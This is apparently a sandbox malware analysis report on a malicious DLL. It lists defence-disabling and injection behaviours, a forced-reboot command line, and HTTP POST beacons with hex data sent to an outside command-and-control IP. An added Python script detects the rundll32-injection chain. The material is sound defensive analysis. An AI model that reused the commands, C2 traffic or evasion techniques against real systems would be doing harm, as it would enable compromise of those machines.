
Windows Analysis Report
BJtPlI.dll

Overview

General Information

Sample name: BJtPlI.dll
Analysis ID: 1634520
MD5: 056f31e74efa70a140105fdd74cff033
SHA1: 162d5e9629452262324c8523895bc58e043496b0
SHA256: 6a66672beba2df1babb7801f63f3e171cf09b0807e1f7be86b42617a29eb983b
Tags: dll, user-seeker

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contains functionality to modify Windows User Account Control (UAC) settings
Disable Windows Defender real time protection (registry)
Disables UAC (registry)
Disables Windows Defender (deletes autostart)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Modifies Windows Defender signatures updates days
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Uses shutdown.exe to shutdown or reboot the system
Checks if the current process is being debugged
Contains functionality to query network adapter information
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Shutdown
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7512 cmdline: loaddll32.exe "C:\Users\user\Desktop\BJtPlI.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7648 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7752 cmdline: rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 7904 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • WerFault.exe (PID: 6880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7904 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • rundll32.exe (PID: 2736 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • shutdown.exe (PID: 6804 cmdline: shutdown /r /t 0 /f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
        • rundll32.exe (PID: 6852 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • WerFault.exe (PID: 2852 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • rundll32.exe (PID: 7004 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7692 cmdline: rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8 MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 6836 cmdline: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • shutdown.exe (PID: 8088 cmdline: shutdown /r /t 0 /f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
      • rundll32.exe (PID: 8080 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 7464 cmdline: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • shutdown.exe (PID: 6876 cmdline: shutdown /r /t 0 /f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
      • rundll32.exe (PID: 6860 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 7952 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • rundll32.exe (PID: 5888 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 6668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 6880 cmdline: rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",cmlPc6dI8 MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6884 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Sigma: Invoke-Obfuscation CLIP+ Launcher and Invoke-Obfuscation VAR+ Launcher (both by Jonathan Cheong, oscd.community; both matched the same event) | Data: Command: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, CommandLine: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7884, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, ProcessId: 6836, ProcessName: cmd.exe
Note: the matched command line is a plain cmd.exe /c shutdown with no obfuscation in it, so the two Invoke-Obfuscation hits are low-confidence and add nothing beyond the shutdown rule itself. The detections that carry weight here are the parameterless rundll32.exe (the injection target, spawned by the rundll32.exe that loaded the DLL) and the forced reboot launched from it.
Source: Process started | Sigma: Rundll32 Execution Without CommandLine Parameters (Florian Roth, Nextron Systems) | Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7692, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 7884, ProcessName: rundll32.exe
Source: Process started | Sigma: Suspicious Execution of Shutdown (frack113) | Data: Command: shutdown /r /t 0 /f, CommandLine: shutdown /r /t 0 /f, CommandLine|base64offset|contains: v', Image: C:\Windows\SysWOW64\shutdown.exe, NewProcessName: C:\Windows\SysWOW64\shutdown.exe, OriginalFileName: C:\Windows\SysWOW64\shutdown.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6836, ParentProcessName: cmd.exe, ProcessCommandLine: shutdown /r /t 0 /f, ProcessId: 8088, ProcessName: shutdown.exe
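The process chain the Sigma hits above describe, turned into detection logic. This is an added example, not Joe Sandbox or Sigma project code: it approximates the two rules the sandbox fired ("Rundll32 Execution Without CommandLine Parameters" and "Suspicious Execution of Shutdown") over Sysmon-style process-creation records and then links them through parent PIDs, so the analyst sees the whole chain rather than two isolated alerts. The records are constructed from the report's process tree; the loaddll32 path, its parent PID 1000 and the benign rundll32 control entry (PID 4242) are assumptions made for the example.

```python
"""Process-chain triage for this report.

Added example, not Joe Sandbox or Sigma project code. It approximates the two
Sigma hits the sandbox reported, "Rundll32 Execution Without CommandLine
Parameters" and "Suspicious Execution of Shutdown", over Sysmon-style
process-creation records and then links them through parent PIDs, so the
analyst sees the whole chain the report's tree shows:
rundll32 <dll>,<export> -> parameterless rundll32 (injection target) -> cmd -> shutdown.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's process tree (PIDs and command lines are the
# report's; the loaddll32 path, its parent PID 1000 and the benign rundll32
# control record with PID 4242 are assumptions for the example).
EVENTS = [
    Proc(7512, 1000, r"C:\sandbox\loaddll32.exe", r'loaddll32.exe "C:\Users\user\Desktop\BJtPlI.dll"'),
    Proc(7692, 7512, r"C:\Windows\SysWOW64\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8"),
    Proc(7884, 7692, r"C:\Windows\SysWOW64\rundll32.exe", r'"C:\Windows\SysWOW64\rundll32.exe"'),
    Proc(6836, 7884, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f"),
    Proc(6828, 6836, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    Proc(8088, 6836, r"C:\Windows\SysWOW64\shutdown.exe", r"shutdown /r /t 0 /f"),
    Proc(6860, 7692, r"C:\Windows\SysWOW64\rundll32.exe", r'"C:\Windows\SysWOW64\rundll32.exe"'),
    Proc(7952, 6860, r"C:\Windows\SysWOW64\WerFault.exe", r"C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 80"),
    Proc(4242, 1000, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),
]


def rundll32_without_parameters(p: Proc) -> bool:
    """Sigma 'Rundll32 Execution Without CommandLine Parameters', approximated:
    the whole command line is the rundll32 binary, quoted or not."""
    cl = p.cmdline.strip().strip('"').lower()
    return p.image.lower().endswith("rundll32.exe") and cl.endswith("rundll32.exe")


def suspicious_shutdown(p: Proc) -> bool:
    """Sigma 'Suspicious Execution of Shutdown', approximated: shutdown.exe told
    to reboot (/r) or power off (/s)."""
    flags = set(p.cmdline.lower().split())
    return p.image.lower().endswith("shutdown.exe") and bool(flags & {"/r", "/s"})


def descendants(pid: int, by_parent: dict) -> list:
    """All processes below `pid` in the tree, depth first."""
    out, stack = [], [pid]
    while stack:
        for child in by_parent.get(stack.pop(), []):
            out.append(child)
            stack.append(child.pid)
    return out


def find_injection_chains(events: list) -> list:
    """For every parameterless rundll32, report whether its parent is a rundll32
    that actually loaded a DLL (the loader that spawned it suspended and wrote
    its payload in), which shutdowns hang below it, and whether it crashed
    (WerFault child), matching three of the report's signatures."""
    by_pid = {p.pid: p for p in events}
    by_parent: dict = {}
    for p in events:
        by_parent.setdefault(p.ppid, []).append(p)
    chains = []
    for p in sorted(events, key=lambda e: e.pid):
        if not rundll32_without_parameters(p):
            continue
        parent = by_pid.get(p.ppid)
        loader = (parent is not None
                  and parent.image.lower().endswith("rundll32.exe")
                  and ".dll" in parent.cmdline.lower())
        below = descendants(p.pid, by_parent)
        chains.append({
            "pid": p.pid,
            "loader_pid": parent.pid if loader else None,
            "shutdown_pids": [d.pid for d in below if suspicious_shutdown(d)],
            "crashed": any(d.image.lower().endswith("werfault.exe") for d in below),
        })
    return chains


if __name__ == "__main__":
    for chain in find_injection_chains(EVENTS):
        print(chain)
```

The benign control record (rundll32 with a named export) is there to show that the rule keys on the absence of any argument, not on rundll32 itself; a parameterless rundll32 whose parent is the rundll32 that loaded the sample is the hollowed child the report's "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures refer to.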
No Suricata rule has matched


AV Detection

Source: BJtPlI.dll | Avira: detected
Source: BJtPlI.dll | Virustotal: Detection: 65%
Source: BJtPlI.dll | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
Source: BJtPlI.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 188.166.28.204:80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.2.5:49715 -> 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.2.5:49713 -> 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.2.5:49712 -> 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.2.5:49710 -> 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.2.5:49707 -> 8.8.8.8:53
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASN, US
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 188.166.28.204 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 | Content-Type: application/x-www-form-urlencoded | Content-Length: 0
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 708Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 64 30 63 66 31 33 37 61 35 35 32 33 61 65 38 39 32 34 62 34 33 37 62 36 34 32 32 38 36 65 30 36 38 35 61 36 34 32 36 37 32 62 66 62 65 65 63 34 34 62 33 35 63 33 35 31 30 38 66 61 62 31 63 64 61 62 34 38 38 62 66 32 61 63 66 63 63 36 30 61 33 39 66 37 66 38 30 64 39 62 65 39 33 33 63 62 31 63 63 34 66 64 36 62 63 38 36 61 37 62 62 33 35 35 66 63 37 30 62 30 65 38 30 36 37 32 64 64 37 30 33 62 61 37 61 31 65 39 38 64 63 61 61 62 38 34 63 33 65 30 37 36 33 66 32 30 66 65 35 34 65 39 65 36 39 31 63 35 61 32 39 32 34 62 38 34 33 35 37 61 31 33 39 33 38 34 66 33 31 38 30 39 35 62 38 38 39 65 35 63 31 61 33 39 64 37 63 31 66 32 66 39 30 61 61 36 39 36 66 39 35 39 38 38 66 39 64 32 30 38 32 63 37 65 36 38 37 65 66 36 66 36 62 62 66 61 39 62 31 30 38 38 34 65 61 33 65 32 39 32 34 31 31 34 39 61 33 35 30 37 65 36 39 34 61 34 66 64 30 35 34 30 37 37 33 63 64 62 38 63 34 32 64 34 39 39 33 33 66 36 38 34 62 63 35 37 37 33 38 66 62 38 35 32 30 33 39 35 35 37 37 35 37 62 33 31 61 32 63 65 65 66 36 34 33 64 65 64 31 34 32 65 62 62 65 63 37 36 65 31 33 64 64 66 32 31 64 36 37 38 37 64 39 32 34 31 30 35 61 65 66 30 36 39 65 36 36 61 31 34 66 31 35 35 36 65 32 33 33 34 33 66 34 34 32 65 36 30 39 36 64 37 38 38 39 32 61 38 64 63 39 30 37 31 34 66 65 
36 66 61 66 34 37 36 38 37 66 32 30 39 33 39 34 66 64 63 65 33 37 35 62 39 61 33 61 64 65 66 65 62 66 62 33 39 62 32 38 65 62 37 65 61 63 65 61 37 32 31 39 66 62 64 32 66 61 32 38 65 38 32 36 31 36 34 66 37 32 37 61 33 39 36 34 64 65 62 64 35 35 31 30 65 33 36 62 65 34 36 30 39 35 39 61 36 32 38 34 35 32 37 65 39 38 36 64 61 33 39 32 32 39 64 61 37 32 64 34 61 64 31 38 64 35 38 37 66 63 61 64 30 32 38 Data Ascii: [not reproduced]
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 188.166.28.204 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 | Content-Type: application/x-www-form-urlencoded | Content-Length: 0 (four identical requests)
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 724Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 34 65 33 35 30 64 36 65 35 65 32 64 30 30 33 62 35 61 65 63 33 31 65 30 37 66 38 63 62 64 66 61 37 31 65 63 35 62 62 35 37 38 33 64 37 38 34 32 62 66 65 37 38 33 36 61 66 39 66 34 30 38 32 65 66 64 63 39 35 66 37 36 33 33 63 64 63 34 63 38 37 65 36 33 63 33 34 31 33 35 66 33 34 31 30 62 63 61 62 61 66 62 32 61 39 39 63 32 63 66 63 31 32 33 34 30 32 34 33 31 31 33 38 32 39 34 35 64 33 32 62 36 32 39 66 37 37 37 38 35 33 61 30 30 30 61 37 38 31 34 31 34 33 34 38 37 33 34 34 63 39 65 66 65 33 64 39 32 34 31 61 37 35 64 66 36 33 65 30 62 34 33 65 36 64 36 62 66 32 64 64 34 35 31 62 32 37 64 31 33 38 33 63 61 65 30 38 33 64 61 35 61 39 39 30 39 34 36 35 38 62 37 33 35 66 35 30 64 33 62 63 37 30 65 63 39 62 34 38 66 36 39 34 37 35 62 33 37 63 33 32 62 62 62 62 32 33 66 34 34 33 63 30 62 66 32 37 64 63 33 63 64 33 32 33 39 65 66 33 34 37 34 65 38 31 33 39 35 63 39 63 35 36 63 61 64 34 35 64 62 37 37 30 64 64 33 39 31 62 35 65 32 63 37 35 65 36 62 39 39 34 37 37 30 35 64 34 66 31 34 33 31 64 37 37 31 37 61 39 34 37 39 66 33 65 31 64 31 31 35 39 62 62 31 32 39 37 33 35 65 31 33 33 33 62 64 37 31 39 36 30 33 63 38 34 31 35 63 34 30 37 33 65 64 63 32 64 61 61 63 63 37 65 65 61 39 61 30 39 31 31 38 61 38 39 36 34 38 39 64 66 35 32 33 39 39 35 
31 35 30 35 63 61 34 38 64 34 34 63 65 62 34 35 38 65 30 31 37 66 33 61 61 64 62 35 31 32 38 63 61 39 63 39 35 64 62 38 30 65 65 30 38 35 64 63 39 64 61 39 64 35 31 66 63 63 33 30 35 39 64 37 34 36 36 36 65 39 33 63 32 34 62 62 62 65 30 66 31 31 64 66 63 36 36 38 32 64 64 35 62 64 62 35 63 31 61 38 64 34 30 33 35 64 38 39 64 31 62 61 34 30 34 61 31 37 63 61 62 36 62 38 34 32 61 61 63 39 36 32 37 38 38 62 62 30 32 61 34 66 38 34 39 31 33 62 64 37 36 Data Ascii: [not reproduced]
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 718Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 32 35 38 66 62 61 62 36 36 36 36 34 30 36 35 31 33 33 61 64 32 35 33 62 65 36 64 31 36 32 30 62 38 63 39 39 34 66 66 63 39 35 38 35 63 33 65 37 61 34 33 32 35 30 65 61 32 34 30 61 33 65 65 38 62 37 37 61 31 33 39 39 33 33 31 37 34 61 30 36 38 64 66 33 63 30 65 30 32 36 32 35 66 32 63 39 65 61 33 38 62 34 31 30 36 39 61 36 35 32 36 61 34 37 30 62 36 35 61 35 61 66 64 66 38 61 63 64 34 64 32 34 65 65 64 36 37 35 36 39 39 33 39 30 32 32 39 62 39 66 35 34 65 35 61 32 38 34 36 64 62 64 33 39 61 38 32 30 63 30 66 32 65 31 61 63 31 38 38 62 64 38 62 64 31 65 31 34 37 63 38 64 36 31 38 39 61 63 33 30 30 34 30 38 34 34 63 63 36 38 38 66 65 33 37 61 63 64 30 32 62 62 31 39 32 37 63 66 64 39 66 35 36 34 65 61 64 62 36 38 39 34 31 35 66 34 62 61 32 65 37 31 62 32 37 66 37 37 63 32 61 38 66 32 65 37 37 62 30 64 62 61 61 38 37 63 65 30 35 64 34 63 66 37 66 37 31 65 61 66 37 31 33 38 64 64 36 33 35 31 39 38 35 32 39 65 61 63 31 34 35 65 35 37 65 61 35 37 37 35 32 63 30 33 65 33 62 35 66 30 63 38 66 66 30 66 36 35 62 64 66 30 61 66 38 62 36 31 39 36 62 37 30 61 35 34 36 30 32 33 65 37 36 39 62 32 31 65 63 33 33 31 63 35 62 33 38 32 34 30 31 33 33 31 62 34 37 37 32 37 30 36 38 33 35 64 66 33 64 35 61 33 64 31 32 31 35 34 66 35 38 38 38 34 33 32 66 
31 63 66 36 33 66 64 35 39 64 64 62 38 39 65 31 31 65 64 31 30 31 63 65 31 66 38 33 31 30 62 32 33 32 38 30 63 33 39 32 34 61 37 31 37 32 36 66 31 37 34 35 64 37 32 61 38 65 63 64 62 61 62 39 37 39 64 32 33 37 63 34 32 31 63 33 66 65 36 33 34 35 64 64 61 37 62 33 62 34 34 30 30 38 32 65 31 62 30 32 62 31 65 35 66 65 36 64 61 33 30 31 38 63 30 64 63 35 38 62 62 32 64 34 61 64 31 38 64 35 38 37 66 63 61 64 30 32 38 31 37 36 35 66 31 Data Ascii: [not reproduced]
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 728Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 37 39 63 62 66 31 64 64 65 39 34 30 38 65 61 32 36 62 38 62 35 36 37 61 66 32 37 65 63 34 64 30 63 66 36 35 33 38 64 63 37 32 65 34 32 32 65 64 31 34 65 66 64 62 36 31 61 61 32 31 65 64 34 32 64 63 31 65 61 65 64 32 31 37 64 30 66 35 38 62 33 32 66 65 65 34 66 30 63 65 34 35 36 38 32 64 66 65 38 34 64 65 35 63 37 30 63 31 31 66 64 63 38 38 31 32 34 61 33 38 39 39 34 61 65 61 38 61 31 39 63 65 37 66 37 62 33 33 30 32 31 63 64 37 35 63 61 32 66 32 37 61 37 35 66 37 30 39 32 64 62 31 34 63 62 30 63 33 64 37 38 66 35 63 37 66 65 35 63 32 62 61 64 62 66 34 63 62 33 65 32 61 35 66 31 30 37 33 66 62 30 62 37 63 39 35 62 30 61 34 34 36 37 36 38 30 66 64 63 37 65 35 31 38 66 30 34 64 66 66 36 35 31 33 64 66 65 39 38 62 37 34 61 63 65 37 34 65 66 33 35 30 62 64 37 30 61 62 35 37 36 33 61 36 35 32 33 36 37 38 31 31 31 63 31 39 62 39 31 31 33 31 62 35 31 36 38 64 65 32 63 65 61 39 37 62 64 38 32 66 34 30 63 63 32 30 37 32 36 36 33 32 31 64 33 30 66 32 30 64 65 31 35 33 39 37 38 35 30 30 32 63 61 63 64 30 38 36 30 32 34 36 38 30 61 33 65 37 61 32 35 35 35 66 61 35 39 63 66 39 31 61 33 36 65 34 30 61 36 30 62 38 64 32 39 65 34 61 30 62 64 30 37 35 63 32 37 66 64 36 38 33 38 31 64 37 61 64 33 31 30 35 38 63 62 64 34 35 31 64 33 37 62 62 39 34 32 
36 37 32 31 66 38 32 64 30 33 38 31 36 30 34 35 65 34 65 30 38 30 30 64 65 36 66 61 64 62 64 66 33 37 38 37 35 31 31 61 64 35 65 66 65 31 31 34 30 34 38 64 61 33 33 31 62 32 38 64 30 33 62 36 31 65 62 39 33 36 33 66 62 39 65 34 63 39 30 34 61 31 35 64 30 62 33 66 34 66 32 34 64 32 65 38 62 65 33 61 39 34 30 30 66 32 65 61 37 30 61 39 38 61 66 66 39 38 66 64 66 64 33 34 34 39 38 30 37 32 32 32 39 66 62 30 39 35 39 66 38 64 31 63 35 63 66 30 30 33 33 61 66 65 36 Data Ascii: 8308e0536daf5c8edd59fe3430214dffbfade4515a4a895844ec0c8edf1a11a7b48ace4bbacfc0257956dcf828b6e30489e1e85b5d91d65f09ae69f761aef2bc3ed09b26fed127f80cfa99980d3679cbf1dde9408ea26b8b567af27ec4d0cf6538dc72e422ed14efdb61aa21ed42dc1eaed217d0f58b32fee4f0ce45682dfe84de5c70c11fdc88124a38994aea8a19ce7f7b33021cd75ca2f27a75f7092db14cb0c3d78f5c7fe5c2badbf4cb3e2a5f1073fb0b7c95b0a4467680fdc7e518f04dff6513dfe98b74ace74ef350bd70ab5763a6523678111c19b91131b5168de2cea97bd82f40cc207266321d30f20de1539785002cacd086024680a3e7a2555fa59cf91a36e40a60b8d29e4a0bd075c27fd68381d7ad3105
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 718Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 32 35 38 66 62 61 62 36 36 36 36 34 30 36 35 31 33 33 61 64 32 35 33 62 65 36 64 31 36 32 30 62 38 63 39 39 34 66 66 63 39 35 38 35 63 33 65 37 61 34 33 32 35 30 65 61 32 34 30 61 33 65 65 38 62 37 37 61 31 33 39 39 33 33 31 37 34 61 30 36 38 64 66 33 63 30 65 30 32 36 32 35 66 32 63 39 65 61 33 38 62 34 31 30 36 39 61 36 35 32 36 61 34 37 30 62 36 35 61 35 61 66 64 66 38 61 63 64 34 64 32 34 65 65 64 36 37 35 36 39 39 33 39 30 32 32 39 62 39 66 35 34 65 35 61 32 38 34 36 64 62 64 33 39 61 38 32 30 63 30 66 32 65 31 61 63 31 38 38 62 64 38 62 64 31 65 31 34 37 63 38 64 36 31 38 39 61 63 33 30 30 34 30 38 34 34 63 63 36 38 38 66 65 33 37 61 63 64 30 32 62 62 31 39 32 37 63 66 64 39 66 35 36 34 65 61 64 62 36 38 39 34 31 35 66 34 62 61 32 65 37 31 62 32 37 66 37 37 63 32 61 38 66 32 65 37 37 62 30 64 62 61 61 38 37 63 65 30 